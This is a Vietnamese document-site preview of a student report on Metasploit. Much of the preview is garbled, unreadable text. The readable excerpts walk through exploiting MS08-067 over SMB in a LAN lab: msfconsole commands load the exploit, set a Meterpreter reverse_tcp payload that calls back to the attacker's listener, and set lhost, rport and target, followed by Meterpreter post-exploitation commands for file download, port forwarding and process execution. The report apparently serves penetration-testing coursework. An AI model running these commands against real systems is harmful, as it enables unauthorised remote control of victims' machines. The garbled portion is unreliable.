Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống
1
/ 28 trang
THÔNG TIN TÀI LIỆU
Thông tin cơ bản
Định dạng
Số trang
28
Dung lượng
1,95 MB
Nội dung
!" #$ %&'() *+,-$ +!./01+2 )",-#"31"$ 45!6" +!./"78++9 +!./"!":. ;01<" +!./!6" =>?@AB Mc lc "CD+AEF+G!9, H#9IJK# L#"! !"#$%%&'#(%)%*+,-#./01%-%2"&34 5%&)6789:;%'#<0.=+*,9>,5?,3@7:"A"BCB %&0.$BDEFBBB9")%*G1%-H#. 789:0IB537#,;J ;K%B",&L%M%2, .N%2,)+,=05%&"O,7"J3P;O,7"J3QR;STUV"A %&" W 7: # 5?, 3@ 7: %5X Y0.' 3@7:5 O"&7 B&"33,;)7% 33 Z4D,), $% (,8[D%%2,33\#]]^7,_&9>,%,'0+=60( 1,0.)`D,,D,%#"9,3aP2,+b.;""&9ZB""#+c %& .34Y0I%,)6E:%3B",%d&#J"&D9&3,",# N e39>,#(%#+,/0f+( H7L )6%3B",%d&#J"&DgZdh9#(%#Y,/0#(%) %*J,7"J3+ 8#%2,f%&9%.Y0.'30*%#%& 7,_;#i,5?,+M%0$&Hja%3B",%7"#"Ka>,34&+?, 6Zd]%%" (%,/B+-D,-#%&%"%E%,5#(%0( #2Z4&#k%.#(%%&"f34D,)%l98I%%&"%?,, m+b. n,>,%,)09=%3B",% %3B",%0IB#(%=gK&#J"&Dh"l%B%,) 9%4,)D,%L+?,+,-6#(%9D, %1530j ^ MI1,H4.gB%,)hj#(%,'W0 !"#$%"A0 IBB%,)&#(%D!\7_ 8%%5X%&"Bm#=# MI1KI!4Hg%,/%(hj,'W0 !"#$%%E "" 0IB 9K.IIgBb%Nhj,'W0"Af5?,D %&'%"%/,>, k%+m0Bb%N+-Y+8D!\ D,%6111%-+5FD,%.DE.D, %%eY,=07,6+"2#cD,%+5F%,'#9" n,,+"2.G "M#9,)o,W7:7_ 8% %5X ^ (NJK#OH,HKJPH#gB%%&,-D,%hj#(%b0%&!J",K" fb0p,<0%&i+c+5FY+8;<0%&B%%&,- D,% k%+m0q,=0.+L,p,34,-0 ,/%9=3b03k9= %,6 (Y@r;#c33# .;+8s"KK3%3;9B."7 R HI#+gD,-#%&hj+b.,,+"2"7&D,-#%&#cD, %+*,9>,=%!D0;1,789:g3&9,BDh; "A"A !9,9%$#N1%-+*,9>, (Y@r D0 t QHKH9IHgB%hjZ0D,D,%+5F%@,)#9 %E3*:%-m%,/%"1%4%,%E+c+5FY +8;"7&3uB%D,%"A&,'%5"A%&'7,_+ E(Ps%"!;D,%3u+5F%,s %3B",%#(%74 !"#$%#.%N0IB%E%,9=9I += !"#$%G5,lB+o9=D,-#%&Yb#$B9B%%&,-) %*B%,)Yb# $B(%74"&I%, %,/6%3B",% %3B",%d&#J"&D R %3B",%d&#J"&D#(%#E,%&5?7v+-D,-#%&;%IE9 D,%,63&9,%3B",%+5FYb.74%&'Ef5> +*,%5F&;9>,f"#B"%3+5F9,/% H;33# &9.%" %3B",%1%-2.%&'m0/%)+,=0j,0Y;O,7"J3;wZ l%1%-7"J"75X%&%3B",%%2,JJJ#%3B",%"# %3B",%+c+5F%NFB3x%&"[D%&DRy,' !#>,I% 6%3B",%9^Q (%3*2/6=%!.j • ,"7,)%&0.$B%eY63!Bz#.;6./0#3K,9 #3KJ ;DE0IB I%D#(%Y%45?,7v%eY"; 91%-7{+/D,%3, • |ED,%"%&'=J H#9IJK#R49PHS4T |,/%&l6%3B",%d&#J"&D !"#$%&"'$ f%BmN%&"D,/%&l6#(%d&#J"&D "M#j t QHNj%BmX !I%6%" (D,/%&ld&#J"&D yY9,/%%k%6y0 .}Y%3,", &&.;#(%%$BFB>B; #"701%-+5F3@7: ~,B%%&,-+-B%%&,- 74"AE:"Zdg%3B",%d&#J"&Dh R49PHS4T4HgD0•,hj "M##(%%$B)%*" 5#"70<0!r;<0!rB,';34D,)+,=0B*,€•, G0IB"%#(%,"7,)%>,#"70;%,)N 30 6d&#J"&D|0•, "M#j • Datastore: +5F,-05#(%#E,%&5?;1 "M##(% ,%&8 \#1%-+5F3@7: ~,#"70%#,/0 +/5X%&. H,%&8+,=0D,-[,/ #E,%&5?#(%%&"f,%&859$.;1+5F3@ 7: ~,#"70D,%. ~,K&#J"&D+-Y +8NY9,+5F%4,) • Event Notification g%E "34D,)hj"BCB B%%&,-+5&+(:%-9>,%e34D,). +(Y!.&,#(%34D,)3u1#(%%WY@r %5XW9>,1 • Framework Managers:1 ,)# 9: <0! r #"70; B0,;333,"3;•" 3 R49PHS4T9IHgD0X3~hj+5FYb.7474%&'D0E D6D0•,;0IB,"7,)+-1%-7_7%4%, •,(%3*D0X3~j • Configuration: 70.%&#(%I0,'%:9%0%$B %E%,9=I0%&l6%,/%&,+A%;‚25%5 #:*6<0%&,+A%.%0(%ND • Sessions:f%E%,X !9=9,)70.%&;D,-#3"% 9,%&"B,'#9,)65?,7v • Logging:#(%%,)N6Zd"BCB,2,%E %,;,;o,#(%%<0%9,"2% ƒ %0$%f%5?7v (#$")*#(%#.<0C%(, (6%3B",%B*,FB#B9 #"70&,' ,)%6%3B",%+-<0C%9%&0.%#"/0DE1 YB"3"ADE%-<0C%7f,)0+-$B9"%3B",%"##0,%.; 2 1%-2.%&<0C%+-B%,)9%0%$B%E%,6" +,$gD,%hW\N6Zd;,lB%%@,)#D, %Bm#=#,#(%#"700IB#(%B5X%WD, %;9+5FBb"2,&•&+*,9>,%e)+,=0G5B,' ! Bm#=#,)D,%%E%5?749"f+,-#./0.AB5j ,%& (+)#;,%&'W7:J gZ„T•%,";UZZ€h;,%&" <0%&I0;%&,-D,)%*P9N7:D,%#(%,:%-Pe," 7,)J 6Zdi}YB",%3 -.$/'"0 !"#$ P&"@3}YB",%#"703;i#(%YB",%%#0*%@,)# D,%N7:~+b.%%@,)#D,%,,&"3"K%Z&9&Z&9, y%,9%Z%D"&&0B%,"DB ,/6J,UZ 1")%*#%#0*D,%P0$%f"1%-+5F ,-0#(%#.%&2#+($B;#(%:##.%&2#;#(%7!,#2.%" ( #(%#2 … 2)$/g%!,%&ih#(%+"2#c+5FYb.74+-)%*%4%, ."7.+5F4i90IB ~,d&#J"&DN7:#(%""#" #"#(%B."7;1%2"&#(%D/%*,%e#.2b%>,#.6D†%I E;D†%IE1%-k9=#.%N2b%E<0D/% *,(%B."7G1%-+5F,-0+X,!#(%3*b0)+5F %4,)%&')+,=06#.2b(%3*B."7%5?+5F3@ 7:B ,/530j 3!4#52)$/6#7/8 *"#(%,"7,)+,=0D,-;+5F0IB+- 2%4,)%&0. $B%eY9"#.2b *"$/"#(%%$Bb0)+5F3@7:5#(%B."7D,%4 ,)D,%*"$/"%5?+5F9,/% HFBfg33# .h !$/9"#(%Bm#c+($B.1%-Bm#=#H##~ &(W\6%3B",%d&#J"&D;"BCB 2%4,)+5F,=0 Q %WX%&"<0%&D,%(%#"701%-#(%YB",%;#(% B."7DE"2%+(€"2,6#"703uY+8+5F#:+N;W \61N7:;#(%#"70"BCB#~&#(%#"%&'#.2b% +1+5F",#(%#"70YB",% :#""gkh+5FY##(%%Bm%&"%3B",%;+5F 7v+-%4,)?#(%D/%*,N7:j30D,#.2$ 8D,%;1 1%-+5FD-%*,+/#.%IE%E<0#2T%&%:#"".3u Y@rD/%*,9?%&'#.%IE+-1%-+5FD/%*,2,9>,0 H)%*D,% !""""#(%B."7%,'%,/+W\;0IB"l% #(%3%5X%%e%&B&%&3l%1%-#f9,)5%!, 9=#(%%$B%,;I.+5F#c36#$%Dz06%,D"!5?,7v;. Yb#$B9")%*#2%&B&%&2.%&' (>;99$.1DE %- 8B%,) ~,m0/%)%*B%,)Yb#$B 1##(%+(#%3B",%"##0,%.1%-%4,);‚ 25#(%#.<0C%;%IE &0%K"&;D,%;"A%2" "" 2$;" "M#%&%;%3D; ""97f,)0;#(%Bm6D,-# %&Yb#$B(%$;"+2,7,)"#(%DE,#9,)# 23@7: +-D,-#%&Yb#$B9I0# i,D,-#%&Yb#$B+=02.%e %&"#(%$;" 9"0)#(%, !"#$%"A+,-#./0%&"#(%W7:. )%*#3u%&~%#:%,'06fD†%IE(%)%* 8Yb# $B1%-7{+/ 8#I%<0.=D,-#3"%;%IE%e*,789:;%&0.$B 7f,)0%&,BCB;+kB#$%Dz0;9%& (+)# <9,"#W\#>,+5F 30%eB,' !9]; 30 #"70"9,)%#D,/#;%0%$B%E%,;%$#N7L%# gK0‡‡,h9>,Bm#=# n,"7,)6%3B",% %3B",%0IB"l%,=0X#(%,"7,)+-%4,) W\X !61n,"7,)6%3B",% "M#!,"7,) ] [...]... các thông số cần thiết như lhost, lport, rhost, rport, target Page | 24 lhost: Địa chỉ IP của máy tấn công lport: Cổng trên máy tấn công để lắng nghe kết nối rhost: Địa chỉ IP của máy bị tấn công rport:Cổng dịch vụ trên máy bị tấn công( mặc định trong exploit này là 445) target: Hệ điều hành bị tấn công, mặc định là để tự động tìm >set lhost 192.168.1.12 >set lport 4455 (đặt tùy ý) >set rhost... Chương 2 Quét và Khai thác lỗ hổng với Metasploit 2.1 Mô hình khai thác Hình 2.1: Mô hình khai thác Đây là một tấn công được thực hiện bên trong mạng LAN (Local Area Network) Trong hình 2.1 trên, kẻ tấn công sẽ đứng ở máy 192.168.1.12 sẽ tiến hành tấn công và khai thác lỗi trên máy có địa chỉ 192.168.1.x nào đó trong mạng Trong báo cáo này, nhóm sẽ sử dụng lỗi MS08_067_netapi (CVE-20084250)... cuộc tấn công đến máy nạn nhân Ngoài ra, ta có thể thực hiện các cuộc tấn công leo thang đặc quyền hay truy cập từ xa vào máy nạn nhân 3 Post-Exploitation (Sau khai thác): có thể sử dụng thêm các công cụ khác để thu thập được thêm thông tin từ máy nạn nhân (từ đó có thể lấy được các thông tin mật, hay thông tin về điểm yếu của hệ thống mà máy nạn nhân đang tham gia) 4 Reporting (Báo cáo): sử dụng. .. Các lệnh được sử dụng và quá trình khai thác Metasploit chế độ dòng lệnh Để vào chế độ dòng lệnh ta gõ: >msfconsole Để sử dụng exploitta dùng lệnh: >use exploit/windows/smb/ms08_067_netapi Tiếp theo ta chọn payload thích hợp để dùng khai thác: >set payload windows/meterpreter/reverse_tcp Ở đây ta chọn payload này thì máy tấn công sẽ ở chế độ chờ, chờ kết nối đến từ máy bị tấn công Tiếp theo... chúng ta có thể sử dụng các công cụ như Discovery scan, Nexpose scan hay một công cụ được cung cấp bởi Metasploit Community để thu được một danh sách các mục tiêu có thể khai thác hay các dịch vụ đang chạy, cổng đang mở để kết nối được đến máy nạn nhân 2 Exploitation (Khai thác): thực hiện khai thác chúng ta có thể sử dụng các module giúp khai thác tự động hay thực hiện khai thác thủ công để khởi... các công cụ hỗ trợ hữu dụng cho quá trình khai thác Msfconsole cung cấp tất cả trong một giao diện, hầu hết các tùy chọn và thiết lập có sẵn trong Framework Chúng ta có thể sử dụng tất cả mọi thứ, bao gồm việc lên kế hoạch cho quá trình khai thác, tải các module hỗ trợ, thực hiện điều tra hay tạo một listener Để bắt đầu làm việc trên giao diện MSFconsole ta có thể sử dụng lệnh cd /opt /metasploit/ msf3/msfconsole,... ] dst : download file • Sử dụng module để xem bảng định tuyến của remote machine: Net Ipconfig Route • portfwd [ -arv ] [ -L laddr ] [ -l lport ] [ -h rhost ] [ -p rport ] [ -P ] : cho phép tạo port forward giữa host và remote machine • Sử dụng module Process: execute -f file [ -a args ] [ -Hc ] Câu lệnh execute cho phép bạn tạo ra một process mới trên remotemachine và sử dụng process đó để khai... lệnh hay đồ họa Ngoài ra, các giao diện hay tiện ích của Metasploit Framework thường được cung cấp trực tiếp thông qua các hàm chức năng Những tiện ích này có thể rất hữu dụng cho việc phát hiện khai thác các lỗ hổng của hệ thống mà không cần sử dụng toàn bộ Framework Msfconsole đến nay được xem là môi trường làm việc phổ biến nhất của Metasploit Framework vì nó được đánh giá cao Đây là môi... machine • ps: liệt kê những process của remote machine • Sử dụng module Sys: getuid: cho biết username hiện tại của remote machine sysinfo : cho biết thông tin về computername, OS 1.2.5 Các tiện ích hỗ trợ trong Metasploit Page | 17 Metasploit còn hỗ trợ thêm cho người dùng các tiện ích phục vụ tốt cho quá trình thực hiện khai thác Những tiện ích của Metasploit được cung cấp cho người dùng trực tiếp... tham gia) 4 Reporting (Báo cáo): sử dụng các công cụ giúp báo cáo để tạo ra một báo cáo chi tiết các kết quả khai thác được trên máy nạn nhân 5 Cleaning Up (Làm sạch): sử dụng bất kỳ một công cụ Clean Up nào đóng lại tất các cổng được mở ra để thực hiện cho mục tiêu khai thác trên máy nạn nhân (khôi phục lại các cài đặt gốc trên máy nạn nhân) 1.4 Một số công cụ khai thác lỗ hổng bảo mật 1.4.1 . "M#9,)'D/"2"<0%&D,%;%!, #"70%&F;%4,)+,=0%&.%2"#(%,3%& q- k%+m0#9,)%&',"7,)!*%$#$"%1%-3@7:) cd /opt /metasploit/ msf3/msfconsole;9%+5F,"7,) #3@7:530j >.$/!*%$#$" !#=,"7,)"BCB2.%&4%,/B7L);"BCB0